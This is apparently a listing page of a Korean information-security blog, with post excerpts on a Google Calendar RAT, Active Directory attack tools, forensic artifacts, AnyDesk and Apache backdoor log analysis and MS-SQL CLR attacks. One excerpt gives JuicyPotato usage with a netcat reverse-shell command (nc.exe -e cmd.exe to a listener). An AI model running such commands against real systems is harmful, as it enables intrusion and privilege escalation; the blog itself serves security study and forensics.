공부/ETC
구글 캘린더를 이용한 RAT - GCR
점점 정상 클라우드 서비스를 C2로 사용하는 악성코드가 많이 등장하는 것 같다.. 타임라인 분석 시 좀 더 상세하게 확인해야 할 필요가 늘고 있다. 아래는 Github 주소 https://github.com/MrSaighnal/GCR-Google-Calendar-RAT
전체 글
정보보안 블로그!
공부/ETC
Active Directroy 관련 공격 도구
spraykatz Credentials gathering tool automating remote procdump and parse of lsass process. BloodHound Six Degrees of Domain Admin. CrackMapExec A swiss army knife for pentesting networks. pywerview A (partial) Python rewriting of PowerSploit's PowerView. Prenum The perils of the pre-Windows 2000 compatible access group in a Windows domain. adPEAS Powershell tool to automate Active Directory enu..
공부/Programming
C# Selenium 자동 업데이트
1. Chrome Version 확인 private static string GetChromeVersion() { // Note: Chrome must be installed in the default location string keyPath = @"SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe"; string result = null; using (RegistryKey key = Registry.LocalMachine.OpenSubKey(keyPath)) { if (key == null) { MessageBox.Show("Chrome 브라우저가 설치되어 있지 않거나, 기본 경로 설치 경로가 아닙니다.\nChrome 브라우저를 재설치 해..
공부/ETC
JuciyPotato usage
- Victim jp.exe -t * -p C:\Users\12\Desktop\2312\r-shell.bat.bat -l 1337 - shell.bat START C:\Users\12\Desktop\2312\nc.exe -e cmd.exe 10.10.10.10 1111 - Client nc -nlvp 1111
공부/ETC
QEMU image convert to vmdk - QEMU 이미지 변환
클라우드 서비스를 이용하여 관련 이미지를 import하는 경우, QEMU 형식의 파일로 저장될때가 있음. 이 경우, FTK Imager 등으로 인식이 안되는데 이때 아래 도구로 변환이 가능함 qemu-img for Windows https://cloudbase.it/qemu-img-windows/ 도구 다운로드 후 아래 방식으로 현재 이미지 파일의 형식을 먼저 확인 qemu-img.exe info [이미지 파일] "file format" 부분에 현재 이미지 형식을 확인한 뒤, 아래 명령어로 변환 진행 # qemu-img.exe convert -f [기존 이미지 형식] -O [변환 이미지 형식] [기존 이미지명] [변환 이미지명] qemu-img.exe convert -f qcow2 -O vmdk IMAG..
공부/Forensic
Artifacts to check file execution history on Windows system - UserAssist: Windows 시스템에서 파일 실행 이력을 확인하는 아티팩트 - UserAssist
🗣️ Introduction Windows 운영 체제에서 사용자의 파일 실행 이력을 추적하고 분석하는 것은 시스템 및 사용자 관리, 보안, 패턴(사용추이 등)파악 등 다양한 목적에 도움이 됩니다. 특히, 침해사고 분야에서는 실행 이력을 통해 다양한 정보를 파악할 수 있습니다. 먼저, 침해사고 분석에서는 악성코드 실행 및 정보 유출 유무등 실행된 악성코드를 파악하고 분석하여 공격자가 어떤 행위를 수행하였는지에 대해 확인할 수 있습니다. 또한, 기업에서는 비인가 프로그램 실행 유무, 시스템 성능 저하와 관련된 문제를 확인하고 대처할 수 있게됩니다. 이러한 실행 이력은 Windows 시스템 내 다양한 아티팩트에서 확인이 가능하며, 이 글에서는 실행 이력과 관련된 주요 아티팩트들 중 "UserAssist" 대해..
기타
티스토리 게시글에 이모지(Emoji) 넣기
https://ant.design/ Ant Design - The world's second most popular React UI framework Ant Design 5.0 use CSS-in-JS technology to provide dynamic & mix theme ability. And which use component level CSS-in-JS solution get your application a better performance. ant.design https://getemoji.com/ 😋 Get Emoji — All Emojis to ✂️ Copy and 📋 Paste 👌 ✂️ Copy and 📋 Paste Emoji 👍 No apps required Emojis are sup..
공부/Forensic
AnyDesk를 통한 침해사고 로그 분석
🗣️ Introduction 원격 데스크톱 소프트웨어는 사용자가 원격으로 다른 컴퓨터를 제어하고 조작하는 데 매우 유용한 도구입니다. 그중에서도 AnyDesk는 빠르고 안전한 원격 접속을 제공하며, 전 세계 수많은 사용자들에게 인기를 얻고 있습니다. 하지만 이러한 기술이 합법적인 용도로 사용될 수 있다는 것은 물론, 사이버 범죄자들에 의해 악용될 수도 있다는 점을 인식해야 합니다. AnyDesk의 경우, Portable 버전으로 사용이 가능하며 비밀번호 설정을 통해 사용자의 허용 없이 원격으로 접근이 가능합니다. 이러한 특징으로 인해 공격자들은 방화벽 우회, 안티 바이러스 제품 우회 등의 목적을 가지고 AnyDesk를 공격에 활용합니다.실제로, 콘티(Conti), MassScan 랜섬웨어 등 공격자들은 ..
공부/Forensic
아파치 모듈 백도어 기능 및 아티팩트 분석: Apache Mod_Backdoor operation method and Artifact analysis
🗣️ Introduction 웹 서버는 인터넷의 핵심 구성 요소 중 하나로, 웹 페이지를 호스팅하고 사용자에게 웹 콘텐츠를 전달하는데 사용됩니다. 인터넷 상에서 가장 널리 사용되는 웹 서버 소프트웨어 중 하나는 Apache HTTP 서버입니다. 그러나 웹 서버의 보안은 항상 중요한 관심사였으며, 악의적인 공격자들은 여러 방법으로 시스템을 침해하려고 시도합니다. 본 게시물은 Apache HTTP 서버의 백도어 중 하나인 Apache2 mod_backdoor에 대해 소개하고 이에 대한 로그를 분석하고자 합니다. **Apache2 mod_backdoor**는 Apache2 모듈을 사용하는 은밀한 백도어로서, 공격자에게 무단으로 웹 서버에 액세스할 수 있는 기회를 제공합니다. 이 백도어는 시스템의 보안에 심각한..
공부/Forensic
MS-SQL 대상 공격 방식 중 하나인 CLR Assembly(Shell) 공격 : MS-SQL Attacks via the CLR as an alternative to xp_cmdshell
🗣️ Introduction MS-SQL에서는 xp_cmdshell이라는 프로시저를 통해 Windows Command 명령을 수행할 수 있습니다. 하지만 보안상의 이유로 기본적으로 비활성화되어 있으며, xp_cmdshell을 통한 명령 실행의 경우에도 필터링 등으로 차단될 가능성이 높다. SQL Server 2005 부터 Microsoft Windows .NET Framework 의 CLR(Common Language Runtime) 기능을 제공합니다. 이를 통해, NET Framework 언어로 작성된 코드를 SQL Server에서 실행할 수 있게되어 C# 또는 Visual Basic .NET과 같은 .NET Framework 언어로 작성된 함수, 프로시저, 데이터 형식 등을 SQL Server에서 직..